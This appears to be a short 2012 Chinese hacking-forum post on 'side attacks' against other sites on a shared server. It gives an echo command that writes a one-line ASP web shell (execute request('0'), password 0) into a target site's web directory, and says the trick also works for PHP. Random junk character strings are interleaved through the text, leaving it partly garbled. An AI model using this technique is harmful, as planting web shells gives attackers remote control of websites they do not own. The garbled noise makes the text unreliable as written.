在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
7 U9 O# V) [$ t3 Y2 n) f- w- a7 I- X/ @# i' r
命令格式
# R* N# c% R8 z# B0 ], S6 F9 ~6 z: Q$ W4 L
Echo 语句 >目标站绝对目录- c1 v+ ^* f$ ]( u) G# Y) s! x
( x$ U6 h; X) Y& v) O! A% J* x
例如:
+ t% C2 N% f! Y* S
! z! Z, n; R9 P: N/ u2 u' ?3 J7 w% qecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp. V& a e& ?- E; t% c9 [1 `
8 j' M) {1 R9 U$ P这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。, s5 [3 x' Y) R& n8 E; H
|
发表于 2012-9-23 14:40:24
收藏
支持
反对